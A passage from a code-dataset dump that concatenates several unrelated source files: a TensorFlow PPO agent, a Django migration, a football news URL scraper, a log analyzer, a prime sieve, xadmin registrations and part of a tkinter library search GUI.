log_std):\n pre_sum = -0.5 * (((x - mu) / (tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(2 * np.pi))\n return tf.reduce_sum(pre_sum, axis=1)\n\n def _discrete_kl_divergence(self, logp1, logp2):\n return tf.squeeze(tf.reduce_sum(tf.exp(logp1) * (logp1 - logp2), axis=1))\n\n def _gaussian_kl_divergence(self, mu1, log_std1, mu2, log_std2):\n var1, var2 = tf.exp(2 * log_std1), tf.exp(2 * log_std2)\n vec_sum = log_std2 - log_std1 + 0.5 * (((mu1 - mu2)**2 + var1)/(var2 + EPS) - 1)\n return tf.squeeze(tf.reduce_sum(vec_sum, axis=1))\n\n def _mlp(self, x, hidden_sizes=(64,), activation=tf.tanh, output_activation=None):\n for h in hidden_sizes[:-1]:\n x = tf.layers.dense(x, units=h, activation=activation)\n return tf.layers.dense(x, units=hidden_sizes[-1], activation=output_activation)\n\n def _mlp_discrete_policy(self, s, a, hidden_sizes, activation, output_activation, action_space):\n \"\"\"\n generate a policy network for the discrete case\n :param s: state placeholder\n :param a: action placeholder, e.g. input the action series as list [a_1, ..., a_T]\n :param hidden_sizes: list [l1, l2, ...]\n :param activation:\n :param output_activation:\n :param action_space: env.action_space\n :return:\n pi: the action chosen by the current policy at state s\n logp_batch: the list of log probability corresponding to the list of actions a\n logp_pi: the log probability that pi is chosen\n \"\"\"\n act_dim = action_space.n\n act_logits = self._mlp(s, list(hidden_sizes)+[act_dim], activation, None) # [[xx, ..., xx]]\n logps = tf.nn.log_softmax(act_logits) # log prob. distribution of all the actions = log(soft_max) but faster\n pi = tf.squeeze(tf.multinomial(act_logits, 1), axis=1) # sample one action from act_logits [x]\n # batch: list of probabilities [P_a0, P_a1, ...]\n logp_batch = tf.reduce_sum(tf.one_hot(a, depth=act_dim) * logps, axis=1)\n logp_pi = tf.reduce_sum(tf.one_hot(pi, depth=act_dim) * logps, axis=1)\n\n self.logps_old = tf.placeholder(dtype=tf.float32, shape=(None,act_dim), name='logps_old')\n kl_divergence = self._discrete_kl_divergence(logps, self.logps_old)\n return pi, logp_batch, logp_pi #, logps, kl_divergence\n\n def _mlp_gaussian_policy(self, s, a, hidden_sizes, activation, output_activation, action_space):\n \"\"\"\n generate a policy network for the continuous case\n :param s: state placeholder\n :param a: action placeholder, e.g. 
input the action matrix\n a = [[a_11, ..., a_D1],\n [a_12, ..., a_D2],\n ...\n [a_1T, ..., a_DT]]\n :param hidden_sizes: list [l1, l2, ...]\n :param activation:\n :param output_activation:\n :param action_space: env.action_space\n :return:\n pi: the action chosen by the current policy at state s\n logp_batch: the list of log probability corresponding to the list of actions a\n logp_pi: the log probability that pi is chosen\n \"\"\"\n act_dim = action_space.shape[0]\n\n l1 = tf.layers.dense(s, 100, tf.nn.relu, trainable=True)\n mu = 2 * tf.layers.dense(l1, act_dim, tf.nn.tanh, trainable=True)\n std = tf.layers.dense(l1, act_dim, tf.nn.softplus, trainable=True)\n norm_dist = tf.distributions.Normal(loc=mu, scale=std)\n # pi = tf.squeeze(norm_dist.sample(1), axis=0)\n pi = mu + tf.random_normal(tf.shape(mu)) * std\n # use log_prob (not prob): the surrogate loss below exponentiates differences of log-probabilities\n logp_pi = norm_dist.log_prob(pi)\n logp_batch = norm_dist.log_prob(a)\n\n # mu = self._mlp(s, list(hidden_sizes)+[act_dim], activation, output_activation)\n # log_std = tf.get_variable(name='log_std', initializer=-0.5 * np.ones(act_dim, dtype=np.float32))\n # std = tf.exp(log_std)\n # pi = mu + tf.random_normal(tf.shape(mu)) * std\n # logp_batch = self._gaussian_likelihood(a, mu, log_std)\n # logp_pi = self._gaussian_likelihood(pi, mu, log_std)\n\n # mu_old = tf.placeholder(dtype=tf.float32, shape=(None,act_dim), name='mu_old')\n # log_std_old = tf.placeholder(dtype=tf.float32, shape=(None,act_dim), name='log_std_old')\n # kl_divergence = self._gaussian_kl_divergence(mu, log_std, mu_old, log_std_old)\n return pi, logp_batch, logp_pi #, mu, log_std, kl_divergence\n\n def _build_net(self, hidden_sizes=(30,30), activation=tf.tanh, output_activation=None, policy=None, action_space=None):\n # to be stored during the episode\n self.ep_s, self.ep_a, self.ep_r, self.ep_v = [], [], [], []\n self.ep_logps, self.ep_logp_pi = [], []\n\n # placeholders for calculation of loss functions\n self.ep_ret = tf.placeholder(dtype=tf.float32, shape=(None,), name='ep_returns')\n self.ep_adv = tf.placeholder(dtype=tf.float32, shape=(None,), name='ep_advantages')\n self.logp_old = tf.placeholder(dtype=tf.float32, shape=(None,), name='logp_old')\n\n # default policy\n if policy is None and isinstance(action_space, Box):\n policy = self._mlp_gaussian_policy\n elif policy is None and isinstance(action_space, Discrete):\n policy = self._mlp_discrete_policy\n\n with tf.variable_scope('actor'): # TODO\n # self.pi, logp_batch, self.logp_pi, self.logps, self.d_kl = \\\n self.pi, logp_batch, self.logp_pi = \\\n policy(self.s, self.a, hidden_sizes, activation, output_activation, action_space)\n with tf.variable_scope('critic'):\n # self.v = tf.squeeze(self._mlp(self.s, list(hidden_sizes)+[1], activation, None), axis=1)\n self.v = tf.squeeze(self._mlp(self.s, list(hidden_sizes)+[1], activation, None), axis=1)\n\n ratio = tf.exp(logp_batch - self.logp_old)\n min_adv = tf.where(self.ep_adv>0, (1+self.clip)*self.ep_adv, (1-self.clip)*self.ep_adv)\n self.pi_loss = -tf.reduce_mean(tf.minimum(ratio * self.ep_adv, min_adv))\n self.v_loss = tf.reduce_mean((self.ep_ret - self.v)**2)\n with tf.name_scope('train'):\n self.train_pi = tf.train.AdamOptimizer(self.lr_pi).minimize(self.pi_loss)\n self.train_v = tf.train.AdamOptimizer(self.lr_v).minimize(self.v_loss)\n\n self.d_kl = tf.reduce_mean(self.logp_old - logp_batch)\n\n def _get_vars(self, scope=''):\n return [x for x in tf.trainable_variables() if scope in x.name]\n\n def _flat_concat(self, xs):\n return tf.concat([tf.reshape(x, (-1,)) for x in xs], axis=0)\n\n def 
_flat_grad(self, f, params):\n grads = tf.gradients(xs=params, ys=f)\n return tf.concat([tf.reshape(x, (-1,)) for x in grads], axis=0)\n\n def _hessian_vector_product(self, f, params):\n # for H = grad**2 f, compute Hx\n g = self._flat_grad(f, params)\n x = tf.placeholder(tf.float32, shape=g.shape)\n return x, self._flat_grad(tf.reduce_sum(g * x), params)\n\n def _assign_params_from_flat(self, x, params):\n flat_size = lambda p: int(np.prod(p.shape.as_list())) # get number of params in a tensor\n splits = tf.split(x, [flat_size(p) for p in params])\n new_params = [tf.reshape(p_new, p.shape) for p, p_new in zip(params, splits)]\n return tf.group([tf.assign(p, p_new) for p, p_new in zip(params, new_params)])\n\n def _choose_action(self, s):\n a = self.sess.run(self.pi, feed_dict={self.s: s[np.newaxis, :]})\n return a\n\n def _get_agent_status(self, s):\n # a, logp_pi, logps, v = self.sess.run([self.pi, self.logp_pi, self.logps, self.v],\n # feed_dict={self.s: s[np.newaxis, :]})\n a, logp_pi, v = self.sess.run([self.pi, self.logp_pi, self.v],\n feed_dict={self.s: s[np.newaxis, :]})\n return a, logp_pi, v,\n\n def _store_transition(self, s, a, r, v, p, ps):\n self.ep_s.append(s)\n self.ep_a.append(a)\n self.ep_r.append(r)\n self.ep_v.append(v)\n self.ep_logp_pi.append(p)\n self.ep_logps.append(ps)\n\n def _process_rollout(self, last_value):\n ep_r = np.append(self.ep_r, last_value)\n ep_v = np.append(self.ep_v, last_value)\n\n ep_ret = self._discounted_sum_vec(ep_r, self.gamma)[:-1]\n # ep_ret -= np.mean(ep_ret)\n # ep_ret /= np.std(ep_ret)\n\n deltas = ep_r[:-1] + self.gamma * ep_v[1:] - ep_v[:-1]\n ep_adv = self._discounted_sum_vec(deltas, self.gamma * self.lam)\n ep_adv -= np.mean(ep_adv)\n ep_adv /= np.std(ep_adv)\n return ep_ret, ep_adv\n\n def _discounted_sum_vec(self, x, discount):\n return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]\n\n def _conjugate_gradient(self, Ax, b):\n x = np.zeros_like(b)\n r = b.copy() # Note: should be 'b - Ax(x)', but for x=0, Ax(x)=0. Change if doing warm start.\n p = r.copy()\n r_dot_old = np.dot(r, r)\n for _ in range(self.cg_iters):\n z = Ax(p)\n alpha = r_dot_old / (np.dot(p, z) + EPS)\n x += alpha * p\n r -= alpha * z\n r_dot_new = np.dot(r, r)\n p = r + (r_dot_new / r_dot_old) * p\n r_dot_old = r_dot_new\n return x\n\n def _set_and_eval(self, x, alpha, old_params, inputs, step):\n self.sess.run(self.set_pi_params, feed_dict={self.v_ph: old_params - alpha * x * step})\n return self.sess.run([self.d_kl, self.pi_loss], feed_dict=inputs)\n # {self.s: np.vstack(self.ep_s),\n # self.a: np.squeeze(np.array(self.ep_a))})\n\n def _update(self):\n ep_s = np.vstack(self.ep_s)\n ep_a = np.squeeze(np.array(self.ep_a))\n ep_p = np.squeeze(np.array(self.ep_logp_pi))\n # ep_logps = np.vstack(self.ep_logps)\n self.inputs = {self.s: ep_s,\n self.a: ep_a,\n self.ep_adv: self.ep_Adv,\n self.ep_ret: self.ep_G,\n # self.logps_old: ep_logps,\n self.logp_old: ep_p\n }\n for i in range(self.train_pi_iters):\n d_kl, _ = self.sess.run([self.d_kl, self.train_pi], feed_dict=self.inputs)\n if d_kl > 1.5 * self.target_kl:\n print('KL divergence %f exceed threshold %f, early stop at step %d!' 
% (d_kl, self.target_kl, i))\n break\n\n for _ in range(self.train_v_iters):\n self.sess.run(self.train_v, feed_dict=self.inputs)\n\n self.ep_s, self.ep_a, self.ep_r, self.ep_v = [], [], [], []\n self.ep_logps, self.ep_logp_pi = [], [] # empty episode data\n\n def train(self, env, render_threshold_reward, render=False):\n running_reward = None # exponential moving average of episode rewards\n for ep_index in range(self.ep_max):\n s = env.reset()\n for step_index in range(self.ep_steps_max):\n if render:\n env.render()\n a, logp_pi, v = self._get_agent_status(s)\n a = np.clip(a, -2, 2)\n\n s_, r, done, _ = env.step(a[0])\n\n self._store_transition(s, a, r, v, logp_pi, [1])\n\n terminal = done or (step_index == self.ep_steps_max-1)\n if terminal:\n # calculate running reward\n ep_rs_sum = sum(self.ep_r)\n if running_reward is None:\n running_reward = ep_rs_sum\n else:\n running_reward = running_reward * 0.99 + ep_rs_sum * 0.01\n if running_reward > render_threshold_reward:\n render = True # rendering\n print(\"episode:\", ep_index, \" reward:\", int(running_reward))\n\n v_ = r if done else self.sess.run(self.v, feed_dict={self.s: s_.reshape(1, -1)})\n done = False\n self.ep_G, self.ep_Adv = self._process_rollout(v_)\n self._update()\n\n break\n\n s = s_\n","sub_path":"contents/12_Proximal_Policy_Optimization/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":14195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"83623053","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWe need to move from our earlier DurationField to the now-built-in Django\nDurationField. In this migration we create the new field; in migration 20 we'll\ncopy over the data. In 21 we'll delete the old field, and in 22 we'll rename the\nnew one to the old name so as to present the expected API.\n\"\"\"\n\n\nfrom django.db import migrations, models\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"resources\", \"0018_auto_20161213_1603\")]\n\n operations = [\n migrations.AddField(\n model_name=\"partner\",\n name=\"access_grant_term_pythonic\",\n field=models.DurationField(\n default=datetime.timedelta(365), null=True, blank=True\n ),\n ),\n migrations.AlterField(\n model_name=\"contact\", name=\"email\", field=models.EmailField(max_length=254)\n ),\n ]\n","sub_path":"TWLight/resources/migrations/0019_auto_20161216_1650.py","file_name":"0019_auto_20161216_1650.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"524684126","text":"'''\r\nFunctions that will follow the process for analysing the suburls found in the baseurls\r\n'''\r\nimport os\r\nfrom football_functions.generic import pull_html\r\nimport football_functions.source_specific.bbc.process_html as bbc\r\nimport football_functions.source_specific.dailymail.process_html as dailymail\r\nimport football_functions.source_specific.mirror.process_html as mirror\r\nimport football_functions.source_specific.guardian.process_html as guardian\r\n\r\ndef extract_urls(html_loc, organ_loc, date_today, domain_list = None):\r\n '''\r\n Function that will extract the suburls from the HTML found in the baseurls\r\n Takes the location of /Data/HTML and Data/Organisation\r\n '''\r\n\r\n if domain_list is None:\r\n domain_list = os.listdir(html_loc)\r\n\r\n # Start by looping over all the domains we find in the HTML data folder\r\n for domain in domain_list:\r\n print('Now looking at sources from {}'.format(domain))\r\n\r\n # We will then loop over all the 
HTML we find there to start pulling those URLs\r\n search_path = html_loc + domain + '/' + date_today + '/' + 'base_urls'\r\n for html_file in os.listdir(search_path):\r\n html_path = search_path + '/' + html_file\r\n links = []\r\n \r\n # Will only process certain URLsfor each domain\r\n if domain == 'bbc' and 'teams' in html_file:\r\n links.extend(bbc.get_suburls(html_path))\r\n\r\n if domain == 'dailymail' and 'sport_football' in html_file:\r\n links.extend(dailymail.get_suburls(html_path))\r\n\r\n if domain == 'mirror' and 'sport_football' in html_file:\r\n links.extend(mirror.get_suburls(html_path))\r\n\r\n if domain == 'theguardian' and 'teams' in html_file:\r\n links.extend(guardian.get_suburls(html_path))\r\n\r\n # If we have found some links then print them to file in organ_loc\r\n if len(links) != 0:\r\n print('Have found {} links from {}'.format(len(links), domain))\r\n sublinks_path = organ_loc + domain + '/' + date_today + '/'\r\n \r\n # Check if exists\r\n if not os.path.exists(sublinks_path):\r\n print('Making directory {}'.format(sublinks_path))\r\n os.makedirs(sublinks_path)\r\n \r\n print('Writing links file')\r\n with open(sublinks_path + 'sublinks.txt', 'w') as sublink_file:\r\n for link in links:\r\n sublink_file.write('{}\\n'.format(link))\r\n \r\n print('Finished writing to file\\n')\r\n\r\ndef scrape_urls(organ_loc, html_loc, date_today, proxy):\r\n '''\r\n Function that will scrape the suburls found in the baseurls and then save the HTML\r\n So this is executed after the extract_urls function on the links that were saved\r\n '''\r\n error_report = []\r\n mode = 'sublinks'\r\n\r\n # Start by looping the domains we find in the organisation folder - ignoring any non directories\r\n for domain in [domain for domain in os.listdir(organ_loc) if '.' 
not in domain]:\r\n sublink_path = organ_loc + domain + '/' + date_today + '/sublinks.txt'\r\n\r\n with open(sublink_path, 'r') as sublink_file:\r\n for url in sublink_file.readlines():\r\n error_report.append(pull_html.process_url(url.rstrip(), html_loc, mode, date_today, proxy))\r\n \r\n num_urls = len(error_report)\r\n num_failed = len([(url, error) for url, error in error_report if error != 'No error'])\r\n print('Finished reading {} URLs, of which {} failed'.format(num_urls, num_failed))\r\n\r\n return error_report","sub_path":"Back_ups/football_functions_v1/processes/html_extraction/suburls.py","file_name":"suburls.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"271224657","text":"class Analyzer:\n \"\"\"log analyzer\n\n The program reads the file and outputs\n the number of NOK events per minute\n to another file in a convenient format,\n having previously grouped by hours, months, years.\n\n Input data\n file_name -------------- filename to scan\n write_file_name -------- filename to write\n\n \"\"\"\n\n def __init__(self, file_name, write_file_name=None):\n self.file_name = file_name\n self.write_file_name = write_file_name\n self.stat = {}\n\n # Creating a dictionary with specified conditions\n def creating_a_list_of_events(self):\n\n with open(self.file_name, 'r', encoding='UTF8') as file:\n for line in file:\n data = line[1:17]\n not_ok = line[-4:-1]\n if not_ok == 'NOK':\n if data in self.stat:\n self.stat[data] += 1\n else:\n self.stat[data] = 1\n\n # Writing a sorted dictionary to a file\n def write_to_file(self):\n if self.write_file_name is None:\n self.write_file_name = 'NOK_' + self.file_name\n with open(self.write_file_name, 'w', encoding='UTF8') as file:\n for key, value in self.stat.items():\n file.write('[' + str(key) + '] ' + str(value) + '\\n')\n\n def grouping_by_hour(self):\n start_to_cut = 11\n end_cut = 13\n self.grouping(start_to_cut, end_cut)\n\n def grouping_by_month(self):\n start_to_cut = 5\n end_cut = 7\n self.grouping(start_to_cut, end_cut)\n\n def grouping_by_year(self):\n start_to_cut = 0\n end_cut = 4\n self.grouping(start_to_cut, end_cut)\n\n def grouping(self, start_to_cut, end_cut):\n grouped_data = {}\n for i in self.stat.keys():\n sort_value = i[start_to_cut: end_cut]\n\n if sort_value in grouped_data.keys():\n grouped_data[sort_value].update({i: self.stat[i]})\n else:\n grouped_data[sort_value] = {}\n grouped_data[sort_value].update({i: self.stat[i]})\n\n self.write_grouping(grouped_data)\n\n def write_grouping(self, grouped_data):\n # avoid shadowing the built-in dict; iterate over the grouped mapping directly\n with open(self.write_file_name, 'w') as file:\n for key, dict_2 in grouped_data.items():\n for key_dict2, value in dict_2.items():\n file.write(\n str(key) + '-> [' + (\n str(key_dict2) + '] ' + str(value) + '\\n'))\n\n\ntest = Analyzer(file_name='events.txt')\ntest.creating_a_list_of_events()\ntest.write_to_file()\ntest.grouping_by_hour()\n","sub_path":"log_parser.py","file_name":"log_parser.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"285346997","text":"import heapq\n\nclass Primes():\n\tdef __init__(self):\n\t\tself.n = 1\n\t\tself.pq = []\n\t\tself.primes = []\n\t\tself.dict = {}\n\n\tdef __call__(self, bound=None, count=None):\n\t\treturn self.PrimeIter(self, bound, count)\n\n\tdef next_prime(self):\n\t\tif self.n <= 2:\n\t\t\tif self.n == 1:\n\t\t\t\tself.n = 2\n\t\t\t\tself.primes.append(2)\n\t\t\t\treturn 
2\n\t\t\telif self.n == 2:\n\t\t\t\tself.n = 3\n\t\t\t\theapq.heappush(self.pq, (9,3))\n\t\t\t\tself.primes.append(3)\n\t\t\t\treturn 3\n\n\t\tself.n += 2\n\t\twhile True:\n\t\t\t(m,p) = heapq.heappop(self.pq)\n\t\t\tif m < self.n:\n\t\t\t\theapq.heappush(self.pq, (m+2*p,p))\n\t\t\t\tcontinue\n\t\t\telif m == self.n:\n\t\t\t\theapq.heappush(self.pq, (m+2*p,p))\n\t\t\t\tself.n += 2\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tn = self.n\n\t\t\t\theapq.heappush(self.pq, (m,p))\n\t\t\t\theapq.heappush(self.pq, (n*n,n))\n\t\t\t\tself.dict[n] = 1\n\t\t\t\tself.primes.append(n)\n\t\t\t\treturn n\n\n\tdef is_prime(self, q):\n\t\twhile q > self.n:\n\t\t\tself.next_prime()\n\t\treturn self.dict.has_key(q)\n\t\t\t\n\tclass PrimeIter():\n\t\tdef __init__(self, sieve, bound=None, count=None):\n\t\t\tself.idx = 0\n\t\t\tself.bound = bound\n\t\t\tself.count = count\n\t\t\tself.sieve = sieve\n\n\t\tdef __iter__(self):\n\t\t\treturn self\n\n\t\tdef next(self):\n\t\t\tif self.count and self.idx >= self.count:\n\t\t\t\traise StopIteration\n\t\t\tif self.idx >= len(self.sieve.primes):\n\t\t\t\tfor i in xrange(10000):\n\t\t\t\t\tself.sieve.next_prime()\n\t\t\tp = self.sieve.primes[self.idx]\n\t\t\tif self.bound and p > self.bound:\n\t\t\t\traise StopIteration\n\t\t\tself.idx += 1\n\t\t\treturn p\n","sub_path":"euler/primes2.py","file_name":"primes2.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"131934253","text":"import xadmin\nfrom .models import ShopCart, OrderInfo, OrderDetail\n\n\nclass ShopCartAdmin(object):\n list_display = ['user', 'goods', 'nums', 'add_time']\n list_filter = ['user', 'goods', 'nums']\n search_fields = ['user', 'goods', 'nums', 'add_time']\n\n\nclass OrderInfoAdmin(object):\n list_display = ['user', 'order_sn', 'trade_sn', 'pay_status', 'post_script',\n 'order_mount', 'pay_time', 'add_time']\n list_filter = ['user', 'order_sn', 'trade_sn', 'pay_status', 'post_script',\n 'order_mount', 'pay_time']\n search_fields = ['user', 'order_sn', 'trade_sn', 'pay_status', 'post_script',\n 'order_mount', 'pay_time', 'add_time']\n\n\n\nclass OrderDetailAdmin(object):\n list_display = ['order', 'goods', 'goods_num', 'add_time']\n list_filter = ['order', 'goods', 'goods_num']\n search_fields =['order', 'goods', 'goods_num', 'add_time']\n\n\nxadmin.site.register(ShopCart, ShopCartAdmin)\nxadmin.site.register(OrderInfo, OrderInfoAdmin)\nxadmin.site.register(OrderDetail, OrderDetailAdmin)","sub_path":"vue/apps/trade/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318243126","text":"from datetime import datetime, timedelta\r\nimport tkinter as tk\r\nfrom tkinter import OptionMenu, ttk\r\nfrom tkinter.constants import ACTIVE, DISABLED # we will use this later on...\r\nfrom tkinter import messagebox\r\nimport io\r\nfrom PIL import Image, ImageTk\r\nfrom urllib.request import urlopen\r\nimport pandas as pd\r\n\r\nimport BkSearch as bksearch\r\nimport bookborrow as bkborrow\r\n\r\n# categories = [\".NET\", \"Algorithmic Art\", \"Business\", \"Client Server\", \"Client-Server\", \"Computer Graph\",\r\n# \"Computer Graphics\", \"In Action\", \"Internet\", \"Java\", \"Microsoft\", \"Microsoft .NET\", \"Microsoft/.NET\", \"Miscella\", \"Miscellaneous\", \"Mobile\", \"Mobile Technology\", \"Networking\", \"Next Generation Databases\", \"Object-Oriented Programming\", \"Object-Technology 
Programming\", \"Open Source\", \"P\", \"PHP\", \"Perl\", \"PowerBuilder\", \"Programming\", \"Python\", \"S\", \"SOA\", \"Software Development\", \"Software Engineering\", \"Theory\", \"Web Development\", \"XML\", \"internet\", \"java\"]\r\n\r\noptions = {\"Title\": [], \"ISBN\": [], \r\n \"Page Count\": [\"Lesser\", \"Equal\", \"Greater\"],\r\n \"Published Year\": [\"Before\", \"Equal\", \"After\"], \r\n \"Categories\": [], \"Authors\": []}\r\n\r\nclass SearchDisplay(tk.Frame):\r\n def __init__(self, parent, controller, session_user_data):\r\n super().__init__(parent)\r\n self.parent, self.controller = parent, controller\r\n ## Unpack User Session Variables ##\r\n print(session_user_data)\r\n self.user_data = session_user_data\r\n self.user_name = session_user_data[\"userId\"]\r\n self.user_unpaid_fines = session_user_data[\"unpaid_fines\"]\r\n self.user_borrowed = session_user_data[\"borrowed\"]\r\n self.user_reserved = session_user_data[\"reserved\"]\r\n \r\n ## Page Variables ##\r\n # Search Bar #\r\n self.search_text = tk.StringVar()\r\n self.adv_dropdown = tk.StringVar()\r\n self.adv_dropdown.set(\"\")\r\n self.sub_adv_dropdown = tk.StringVar()\r\n self.sub_adv_dropdown.set(\"\")\r\n # Search Results Treeview Display #\r\n self.treedata = tk.StringVar()\r\n \r\n # Book Details Display #\r\n self.photos = {}\r\n self.bk_title = tk.StringVar()\r\n self.bk_author = tk.StringVar()\r\n self.bk_desc = tk.StringVar()\r\n self.bk_status = tk.StringVar()\r\n \r\n self.bk_selected_id = -1 #Currently selected BookId\r\n self.bk_selected_title = \"\"\r\n self.bk_selected_due = \"\"\r\n\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n \"\"\"\r\n Use the following widget abbreviations\r\n Label \tlbl \tlbl_name\r\n Button \tbtn \tbtn_submit\r\n Entry \tent \tent_age\r\n Text \ttxt \ttxt_notes\r\n Frame \tfrm \tfrm_address\r\n \"\"\"\r\n #### Page Content ####\r\n frm_content = tk.Frame(master=self)\r\n frm_content.columnconfigure(0, weight=1)\r\n frm_content.rowconfigure(0, weight=1)\r\n frm_content.rowconfigure(1, weight=10)\r\n frm_content.rowconfigure(2, weight=2)\r\n frm_content.pack(fill=tk.BOTH, pady=(5,20), expand=True)\r\n\r\n # Some general styling vars\r\n HOME_CONTENT_PADX = 20\r\n\r\n ### Search ###\r\n frm_search = tk.Frame(master=frm_content, borderwidth=1)\r\n frm_search.grid(row=0, column=0, padx=HOME_CONTENT_PADX,\r\n pady=(0, 10), sticky=\"nsew\")\r\n\r\n ## Top row: Header and Error Display ##\r\n frm_search_top = tk.Frame(master=frm_search)\r\n frm_search_top.pack(fill=tk.X,pady=(5,0))\r\n # Label #\r\n lbl_search = tk.Label(master=frm_search_top,text=\"Search Catalog\")\r\n lbl_search.pack(side=tk.LEFT,anchor=\"w\",padx=(0,10))\r\n # Error Display\r\n self.lbl_msg_display = tk.Label(frm_search_top, text=\"\", font=(\"\", 10))\r\n self.lbl_msg_display.pack(side=tk.LEFT,anchor=\"w\")\r\n\r\n ## Top row : Entry + Button ##\r\n frm_search_mid = tk.Frame(master=frm_search)\r\n frm_search_mid.pack(fill=tk.BOTH, expand=True)\r\n\r\n # Search Entry #\r\n search_bar = tk.Entry(master=frm_search_mid,\r\n textvariable=self.search_text)\r\n search_bar.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\r\n\r\n # Search Button #\r\n btn_search = tk.Button(master=frm_search_mid, text=\"Search\", height=1, padx=10,\r\n bg=\"lightblue\",activebackground=\"lightblue\",\r\n command=self.on_search_req_btn_press)\r\n btn_search.pack(side=tk.RIGHT, fill=tk.Y,padx=(5,0))\r\n\r\n \r\n # Bottom row - Advanced search\r\n frm_search_btm = tk.Frame(master=frm_search)\r\n 
frm_search_btm.pack(fill=tk.X, expand=True, pady=(5,0))\r\n\r\n # Drop Down: Advanced Search #\r\n self.drop = ttk.Combobox(frm_search_btm,state=\"readonly\",width=15)\r\n self.drop['values'] = list(options.keys())\r\n self.drop.current(0)\r\n self.drop.pack(side=tk.LEFT, fill=tk.Y)\r\n self.drop.bind('<>', self.getUpdateData)\r\n\r\n # Drop Down: Sub Advanced Search #\r\n self.sub_drop = ttk.Combobox(frm_search_btm, state=\"readonly\",width=10)\r\n \r\n #### Search Result Display Treeview ####\r\n frm_results = tk.Frame(master=frm_content, borderwidth=1)\r\n # browse - only 1 item can be selected\r\n tv = ttk.Treeview(frm_results, selectmode=\"browse\")\r\n tv.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\r\n\r\n ## Configure Treeview ##\r\n HEADINGS = ('Id', 'Title', 'Status', 'Reserved')\r\n tv['columns'] = HEADINGS\r\n tv[\"show\"] = \"headings\" # supresses icon(#0) column\r\n # tv.heading(\"#0\", text='Sources', anchor='w')\r\n # tv.column(\"#0\", anchor=\"w\")\r\n\r\n # Set headings (column names)\r\n for h in HEADINGS:\r\n tv.heading(h, text=h)\r\n # Set column sizing\r\n tv.column(HEADINGS[0], anchor='center', width=40,\r\n minwidth=40, stretch=True)\r\n tv.column(HEADINGS[1], anchor='w',\r\n width=300, minwidth=200, stretch=True)\r\n tv.column(HEADINGS[2], anchor='center',\r\n width=100, minwidth=80, stretch=True)\r\n tv.column(HEADINGS[3], anchor='center', width=100, stretch=True)\r\n\r\n # Bind event handlers\r\n # single click, without \"index out of range\" error\r\n tv.bind(\"<>\", self.on_tree_select)\r\n\r\n ## Scrollbar for Treeview ##\r\n tvScroll = ttk.Scrollbar(frm_results, \r\n orient=\"vertical\", command=tv.yview)\r\n tv.configure(yscrollcommand=tvScroll.set)\r\n tvScroll.pack(side=\"right\", fill='y')\r\n\r\n # Assign treeview\r\n self.treeview1 = tv\r\n\r\n # Add to layout\r\n frm_results.grid(row=1, column=0, padx=HOME_CONTENT_PADX, sticky=\"nsew\")\r\n\r\n\r\n #### Master container for Book Display ####\r\n frm_bottom = tk.Frame(master=frm_content, height=150, \r\n bg=\"white\",borderwidth=1,relief=tk.GROOVE)\r\n frm_bottom.grid(row=2, column=0, padx=HOME_CONTENT_PADX,\r\n pady=(10, 0), sticky=\"nsew\")\r\n frm_bottom.rowconfigure(0,weight=1)\r\n frm_bottom.columnconfigure(0,weight=1)\r\n\r\n #### Book Display ####\r\n frm_bkdispl = tk.Frame(master=frm_bottom,bg=\"white\")\r\n frm_bkdispl.grid(row=0,column=0,padx=10,sticky=\"nsew\")\r\n frm_bkdispl.grid_remove()\r\n self.frm_bkdip = frm_bkdispl\r\n \r\n ### Picture Display ###\r\n self.cnv_picture = tk.Canvas(frm_bkdispl, width = 120, height = 120,bg=\"white\")\r\n self.cnv_picture.pack(side=tk.LEFT,padx=(0,5))\r\n\r\n #### Book Details ###\r\n frm_bkdetails = tk.Frame(master=frm_bkdispl,bg=\"white\",height=100,width=200)\r\n frm_bkdetails.pack(side=tk.LEFT,fill=tk.BOTH,expand=True,padx=(0,15),pady=10)\r\n # Title #\r\n lbl_bk_d_title = tk.Label(master=frm_bkdetails, textvariable=self.bk_title,\r\n font=('',10,'bold'),bg=\"white\")\r\n lbl_bk_d_title.pack(anchor=\"w\")\r\n # Author #\r\n lbl_bk_d_author = tk.Label(master=frm_bkdetails, textvariable=self.bk_author,\r\n font=('',10,'italic'),bg=\"white\")\r\n lbl_bk_d_author.pack(anchor=\"w\")\r\n # Desc #\r\n lbl_bk_d_desc = tk.Label(master=frm_bkdetails, textvariable=self.bk_desc, \r\n justify=\"left\",bg=\"white\",anchor=\"nw\",\r\n height=5,width=50,wraplength=300,\r\n font=('',8))\r\n lbl_bk_d_desc.pack(anchor=\"nw\",expand=True,fill=tk.Y)\r\n\r\n ### Buttons ###\r\n frm_bk_btns = tk.Frame(master=frm_bkdispl, bg=\"white\")\r\n 
